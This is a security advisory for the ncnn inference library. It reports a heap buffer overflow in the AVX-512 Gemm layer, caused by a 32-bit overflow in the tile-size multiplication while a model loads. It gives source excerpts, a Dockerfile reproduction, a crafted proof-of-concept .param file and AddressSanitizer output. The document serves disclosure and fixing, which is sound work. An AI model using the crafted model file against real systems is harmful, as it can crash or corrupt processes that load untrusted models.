Heap Buffer Overflow in AVX-512 GEMM Model Loading
Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/gemm_x86.cpp:142 in pack_A_tile
Sanitizer verdict: heap-buffer-overflow
Summary
A crafted .param file causes a multi-megabyte heap overflow while ncnnoptimize is still loading the model, before any inference runs. The Gemm layer's constant_TILE_M and constant_TILE_K values are multiplied as signed 32-bit ints to size the prepacked-A buffer; the product wraps to a small number, while pack_A_tile still copies the full constantM x constantK matrix into it using 64-byte AVX-512 stores.
Detail
Gemm::load_param accepts constantM = pd.get(7, 0), constantK = pd.get(9, 0), constant_TILE_M = pd.get(20, 0) and constant_TILE_K = pd.get(22, 0) without any bound. When constantA is set, Gemm_x86::create_pipeline rounds the tile requests up to the AVX-512 lane width and sizes AT_data from their product:
// src/layer/x86/gemm_x86.cpp:7464
const int M = constantM;
const int K = constantK;
int TILE_M, TILE_N, TILE_K;
get_optimal_tile_mnk(M, 0, K, constant_TILE_M, constant_TILE_N, constant_TILE_K, TILE_M, TILE_N, TILE_K, opt.num_threads);
const int nn_M = (M + TILE_M - 1) / TILE_M;
const int nn_K = (K + TILE_K - 1) / TILE_K;
AT_data.create(TILE_K * TILE_M, nn_K, nn_M, 4u, (Allocator*)0);
// src/layer/x86/gemm_x86.cpp:141
_mm512_store_ps(pp, _r0);
_mm512_store_ps(pp + 16, _r1);
TILE_K * TILE_M is evaluated in int. The PoC supplies 20=65536 and 22=65537; on AVX-512 the rounding in get_optimal_tile_mnk leaves TILE_M = 65536 and raises TILE_K to 65552. Their true product is 4,296,015,872, which wraps to 1,048,576 when truncated to 32 bits. With constantM = constantK = 2000, nn_M and nn_K are both 1, so Mat::create allocates 1,048,576 floats — the 4,194,372-byte region in the ASan report — rather than the ~17 GB the tiles describe.
The packing loop that follows is bounded by the matrix, not by the allocation: max_ii = std::min((M - i), TILE_M) is 2000 and max_kk = std::min((K - k), TILE_K) is 2000, so pack_A_tile writes 4,000,000 floats (16 MB) into the 4 MB buffer. With transA unset the 16x16 transpose path runs and _mm512_store_ps(pp + 16, _r1) is the first store to cross the end of the region. AT_data.empty() is checked, but a successful undersized allocation passes that check, so nothing stops the overflow. The crash lands in build/src/layer/x86/gemm_x86_avx512.cpp, the AVX-512 specialisation generated from this source file.
Reproduce
Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-buffer-overflow-in-avx-512-gemm-model-loading && cd ncnn-poc-heap-buffer-overflow-in-avx-512-gemm-model-loading
cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04
RUN apt-get update && apt-get install -y --no-install-recommends \
git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
protobuf-compiler libprotobuf-dev \
&& pip3 install --no-cache-dir --break-system-packages onnx protobuf \
&& rm -rf /var/lib/apt/lists/*
RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn
WORKDIR /ncnn
RUN cmake -S . -B build \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
-DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
-DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
&& cmake --build build -j"$(nproc)"
ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE
cat > poc.param <<'PARAM'
7767517
1 1
Gemm gemm 0 1 top 4=1 7=2000 9=2000 20=65536 22=65537
PARAM
docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
/ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0
AddressSanitizer output:
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7959194b9840 at pc 0x5ed264f24cad bp 0x7ffd3253f8b0 sp 0x7ffd3253f8a0
WRITE of size 64 at 0x7959194b9840 thread T0
#0 0x5ed264f24cac in _mm512_store_ps(void*, float __vector(16)) /usr/lib/gcc/x86_64-linux-gnu/13/include/avx512fintrin.h:457
#1 0x5ed264f24cac in pack_A_tile /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:142
#2 0x5ed264ffb64f in ncnn::Gemm_x86_avx512::create_pipeline(ncnn::Option const&) /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:7498
#3 0x5ed25e957c96 in ncnn::Net::load_model(ncnn::DataReader const&) /ncnn/src/net.cpp:2094
#4 0x5ed25e86bc34 in main /ncnn/tools/ncnnoptimize.cpp:2793
#5 0x79591cfab1c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#6 0x79591cfab28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#7 0x5ed25e7eb624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
0x7959194b9844 is located 0 bytes after 4194372-byte region [0x7959190b9800,0x7959194b9844)
allocated by thread T0 here:
#0 0x79591d624f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x5ed25e8bc92d in fastMalloc /ncnn/src/allocator.h:62
#2 0x5ed25e8bc92d in ncnn::Mat::create(int, int, int, unsigned long, ncnn::Allocator*) /ncnn/src/mat.cpp:415
#3 0x5ed264ff9d89 in ncnn::Gemm_x86_avx512::create_pipeline(ncnn::Option const&) /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:7473
#4 0x5ed25e957c96 in ncnn::Net::load_model(ncnn::DataReader const&) /ncnn/src/net.cpp:2094
#5 0x5ed25e86bc34 in main /ncnn/tools/ncnnoptimize.cpp:2793
#6 0x79591cfab1c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#7 0x79591cfab28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#8 0x5ed25e7eb624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/lib/gcc/x86_64-linux-gnu/13/include/avx512fintrin.h:457 in _mm512_store_ps(void*, float __vector(16))
Credit
Zheng Yu @ DepthFirst